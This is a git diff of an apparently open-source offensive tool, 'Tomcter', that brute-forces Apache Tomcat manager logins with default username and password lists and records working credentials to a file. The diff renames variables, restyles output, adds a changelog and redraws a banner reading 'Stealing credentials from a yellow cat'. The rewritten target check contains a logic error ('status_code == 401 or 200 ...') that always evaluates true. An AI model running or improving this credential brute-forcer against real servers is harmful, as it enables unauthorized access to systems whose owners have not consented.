diff --git a/CHANGELOG.md b/CHANGELOG.md
new file mode 100644
index 0000000..d6b00d9
--- /dev/null
+++ b/CHANGELOG.md
@@ -0,0 +1,6 @@
+# 🎉 0.6 - 31/07/2022
+- Created CHANGELOG.md file
+- Updated ascii art
+- New banner image
+- New color scheme
+- Fixed multiple website file blank url scanning
\ No newline at end of file
diff --git a/README.md b/README.md
index 1b25a7c..e73603f 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
> Stealing credentials from a yellow cat
-
+
diff --git a/src/core/multiple.py b/src/core/multiple.py
index b2fa029..6c901b4 100644
--- a/src/core/multiple.py
+++ b/src/core/multiple.py
@@ -20,18 +20,20 @@ def connect(args) -> str:
for target in content:
if target == None:
- pass
+ return
target = target.rstrip()
- path: str = f"{target}/manager/html"
+ url: str = f"{target}/manager/html"
try:
- response = get(path, **props)
+ response = get(url, **props)
body: str = response.text
status_code: str = response.status_code
- detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body
- (bruteforce(path)) if detect() else print(f"[red][*] Connection problems with {target} | {status_code} [/]")
+ if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body:
+ bruteforce(url)
+ else:
+ print(f"[red][-] Connection problems with {target} | {status_code} [/]")
except Exception as e:
return print(f"[red][!] An error happened: {e} [/]")
@@ -40,10 +42,11 @@ def connect(args) -> str:
pass
-def bruteforce(path) -> str:
+def bruteforce(url) -> str:
""" Bruteforce Apache Tomcat login with default credentials """
- print(f"[yellow][!] Starting bruteforce on {path} [/]")
+ print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]")
+ print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]")
for u, p in zip(get_usernames(), get_passwords()):
@@ -58,13 +61,13 @@ def bruteforce(path) -> str:
auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() }
- response = get(path, verify=False, headers=auth_header)
+ response = get(url, verify=False, headers=auth_header)
status_code: str = response.status_code
if (status_code == 200):
- print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]")
+ print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]")
with open("src/core/result/out.txt", "a+") as file:
- file.write(f"{path} | {u+p} | {auth_string}")
+ file.write(f"{url} | {u+p} | {auth_string}")
- print(f"[cyan][*] Bruteforce on {path} is done.\n [/]")
\ No newline at end of file
+ print(f"[bold white][*] Bruteforce in {url} is done.\n[/]")
\ No newline at end of file
diff --git a/src/core/single.py b/src/core/single.py
index 0240f2b..e3f315e 100644
--- a/src/core/single.py
+++ b/src/core/single.py
@@ -12,15 +12,17 @@ def single_connect(args) -> str:
""" Check if target is alive and try to connect with Apache Tomcat login page """
target = args.u
- path: str = f"{target}/manager/html"
+ url: str = f"{target}/manager/html"
try:
- response = get(path, **props)
+ response = get(url, **props)
body: str = response.text
status_code: str = response.status_code
- detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body
- (bruteforce(path)) if detect() else print(f"[red][-] Connection problems with {target} | {status_code} [/]")
+ if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body:
+ bruteforce(url)
+ else:
+ print(f"[red][-] Connection problems with {target} | {status_code} [/]")
except Exception as e:
return print(f"[red][-] An error happened: {e} [/]")
@@ -29,10 +31,11 @@ def single_connect(args) -> str:
pass
-def bruteforce(path) -> str:
+def bruteforce(url) -> str:
""" Bruteforce Apache Tomcat login with default credentials """
- print(f"[yellow][!] Starting bruteforce on {path} [/]")
+ print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]")
+ print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]")
for u, p in zip(get_usernames(), get_passwords()):
@@ -47,13 +50,13 @@ def bruteforce(path) -> str:
auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() }
- response = get(path, verify=False, headers=auth_header)
+ response = get(url, verify=False, headers=auth_header)
status_code: str = response.status_code
if (status_code == 200):
- print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]")
+ print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]")
with open("src/core/result/out.txt", "a+") as file:
- file.write(f"{path} | {u+p} | {auth_string}")
+ file.write(f"{url} | {u+p} | {auth_string}")
- print(f"[yellow][!] Bruteforce in {path} is done.\n [/]")
\ No newline at end of file
+ print(f"[bold white][*] Bruteforce in {url} is done.\n[/]")
\ No newline at end of file
diff --git a/src/interface/banner.txt b/src/interface/banner.txt
index 7b5c390..2fca550 100644
--- a/src/interface/banner.txt
+++ b/src/interface/banner.txt
@@ -1,10 +1,5 @@
- ______ ______ __ __ ______ ______ ______ ______
-/\__ _\ /\ __ \ /\ "-./ \ /\ ___\ /\__ _\ /\ ___\ /\ == \
-\/_/\ \/ \ \ \/\ \ \ \ \-./\ \ \ \ \____ \/_/\ \/ \ \ __\ \ \ __<
- \ \_\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_\ \ \_____\ \ \_\ \_\
- \/_/ \/_____/ \/_/ \/_/ \/_____/ \/_/ \/_____/ \/_/ /_/
-
-
-Stealing credentials from a yellow cat ¯\_(ツ)_/¯
-build: 0.5
+ _._ _,-'""`-._
+(,-.`._,'( |\`-/| Tomcter 0.6
+ `-.-' \ )-`( , o o) Stealing credentials from a yellow cat
+ `- \`_`"'-